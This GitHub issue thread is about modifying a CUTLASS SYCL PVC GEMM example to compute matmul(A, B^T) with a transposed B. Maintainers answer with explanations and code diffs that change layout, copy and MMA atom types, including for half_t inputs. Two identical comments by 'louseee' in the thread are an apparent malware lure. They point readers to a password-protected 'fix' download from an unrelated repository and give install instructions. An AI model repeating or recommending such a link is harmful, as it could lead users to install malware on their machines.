### ISSUE TITLE
[QST] How to do matmul(A, B^T)?

### ISSUE THREAD

**Issue by mgrabban** [codeplaysoftware/cutlass-fork#129]
How to do $$matmul(A, B^T)$$?

I was trying to modify this sycl/pvc [example](https://github.com/codeplaysoftware/cutlass-fork/blob/sycl-develop/examples/sycl/pvc/pvc_gemm.cpp), which I believe does $$matmul(A, B)$$, to do $$matmul(A, B^T)$$ (i.e., my B input is transposed) but the verification is failing.  

I made these changes 
- changed [line](https://github.com/codeplaysoftware/cutlass-fork/blob/17ce5ff5a0d4743cae52c79588570ec18e9a3ae0/examples/sycl/pvc/pvc_gemm.cpp#L305) (`using LayoutB = cutlass::layout::RowMajor;`) to `using LayoutB = cutlass::layout::ColumnMajor;` and
- changed [line](https://github.com/codeplaysoftware/cutlass-fork/blob/17ce5ff5a0d4743cae52c79588570ec18e9a3ae0/examples/sycl/pvc/pvc_gemm.cpp#L160) (`cutlass::TensorRef ref_B(block_B.get(), LayoutB::packed({K, N}));` to `cutlass::TensorRef ref_B(block_B.get(), LayoutB::packed({N, K}));`

This [line](https://github.com/codeplaysoftware/cutlass-fork/blob/17ce5ff5a0d4743cae52c79588570ec18e9a3ae0/examples/sycl/pvc/pvc_gemm.cpp#L197) could also be relevant so I also tried with or without the following change, in addition to the above two changes,
- changed [line](https://github.com/codeplaysoftware/cutlass-fork/blob/17ce5ff5a0d4743cae52c79588570ec18e9a3ae0/examples/sycl/pvc/pvc_gemm.cpp#L197) (`stride_B = cutlass::make_cute_packed_stride(StrideB{}, cute::make_shape(N, K, L));`) to `stride_B = cutlass::make_cute_packed_stride(StrideB{}, cute::make_shape(K, N, L));`

Is it possible to modify that example code to do $$matmul(A, B^T)$$? If yes, could you please help me modify the code correctly?

I also suspect it might not be possible since the MMA_Atom `MMA_Atom<XE_8x16x16_F32BF16BF16F32_TT>` might not support it but I'm not sure.

Complementary questions:
Does PVC support BF16 inputs only when using xe cores or other input types are also supported? If it does support other input types, what is your plan to create MMA_Atoms for them?
Thanks!

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mehdi-goli** [comment]
> This [line](https://github.com/codeplaysoftware/cutlass-fork/blob/17ce5ff5a0d4743cae52c79588570ec18e9a3ae0/examples/sycl/pvc/pvc_gemm.cpp#L197) could also be relevant so I also tried with or without the following change, in addition to the above two changes,
> 
> * changed [line](https://github.com/codeplaysoftware/cutlass-fork/blob/17ce5ff5a0d4743cae52c79588570ec18e9a3ae0/examples/sycl/pvc/pvc_gemm.cpp#L197) (`stride_B = cutlass::make_cute_packed_stride(StrideB{}, cute::make_shape(N, K, L));`) to `stride_B = cutlass::make_cute_packed_stride(StrideB{}, cute::make_shape(K, N, L));`
> 

You don't need this changes as by converting the RowMajor, to Colmajor the tag_to_stride_B will capture the correct [make_cute_packed_stride](https://github.com/codeplaysoftware/cutlass-fork/blob/fae9b2e19f799ba7ffbadec70d3ce9bd1e2701ed/tools/util/include/cutlass/util/packed_stride.hpp#L61) function for selecting N as an stride. So this change is not needed

> Is it possible to modify that example code to do m a t m u l ( A , B T ) ? If yes, could you please help me modify the code correctly? 
> I also suspect it might not be possible since the MMA_Atom `MMA_Atom<XE_8x16x16_F32BF16BF16F32_TT>` might not support it but I'm not sure.


At the moment the functionality to load B transpose for xe_copy and the corresponding MMA_Atom is not integrated to the pipeline. we are in the process of adding them and we let you know once it is done.


> Complementary questions: Does PVC support BF16 inputs only when using xe cores or other input types are also supported? If it does support other input types, what is your plan to create MMA_Atoms for them? Thanks!

Currently it is for  BF16, Adding others are in progress.

**Comment by muhammad-tanvir-1211** [comment]
Hi @mgrabban, 
Apologies for the late reply. The features you are looking for are now available in the `sycl-develop` branch:

* To perform  m a t m u l ( A , B T ) , you will need to make the following changes to `pvc_gemm.cpp` example:

```diff
diff --git a/examples/sycl/pvc/pvc_gemm.cpp b/examples/sycl/pvc/pvc_gemm.cpp
index 56b0aee6..cc6dbcdd 100644
--- a/examples/sycl/pvc/pvc_gemm.cpp
+++ b/examples/sycl/pvc/pvc_gemm.cpp
@@ -308,12 +308,12 @@ int main(int argc, const char** argv)
   using ElementOutput = float;                        // <- data type of elements in output matrix D
 
   using LayoutA = cutlass::layout::RowMajor;
-  using LayoutB = cutlass::layout::RowMajor;
+  using LayoutB = cutlass::layout::ColumnMajor;
   using LayoutC = cutlass::layout::RowMajor;
   using LayoutD = cutlass::layout::RowMajor;
 
   using GmemTiledCopyA = XE_2D_U16x32x32_LD_N;
-  using GmemTiledCopyB = XE_2D_U16x32x32_LD_V;
+  using GmemTiledCopyB = XE_2D_U16x16x16_LD_T;
 
   // Workgroup-level tile
   using TileShape = Shape<_256, _256, _32>;

```

* To use a different type for the MMA op, you can do the following, and it should let you build the code with `half_t` as the input type and `float` as the output type.
```diff
diff --git a/examples/sycl/pvc/pvc_gemm.cpp b/examples/sycl/pvc/pvc_gemm.cpp
index 56b0aee6..af3a2f91 100644
--- a/examples/sycl/pvc/pvc_gemm.cpp
+++ b/examples/sycl/pvc/pvc_gemm.cpp
@@ -303,8 +303,8 @@ int main(int argc, const char** argv)
   // elements in input matrices.
   using ElementAccumulator = float;                   // <- data type of accumulator
   using ElementComputeEpilogue = float;  // <- data type of epilogue operations
-  using ElementInputA = bfloat16_t;                        // <- data type of elements in input matrix A
-  using ElementInputB = bfloat16_t;                        // <- data type of elements in input matrix B
+  using ElementInputA = half_t;                        // <- data type of elements in input matrix A
+  using ElementInputB = half_t;                        // <- data type of elements in input matrix B
   using ElementOutput = float;                        // <- data type of elements in output matrix D
 
   using LayoutA = cutlass::layout::RowMajor;
@@ -323,7 +323,7 @@ int main(int argc, const char** argv)
   // ensures that each sub-group operates on a contiguous 32x64x32 chunk (4x4x2 iterations)
   // See 0t_mma_atom.md#TiledMMAs for more info.
   using TiledMma =
-      TiledMMA<MMA_Atom<XE_8x16x16_F32BF16BF16F32_TT>,
+      TiledMMA<MMA_Atom<XE_8x16x16_F32F16F16F32_TT>,
                Layout<Shape<_8, _4, _1>, Stride<_4, _1, _0>>,
                Tile<Layout<Shape<_8, _8, _4>, Stride<_1, _32, _8>>,
                     Layout<Shape<_16, _4, _4>, Stride<_1, _64, _16>>, _32>>;

```
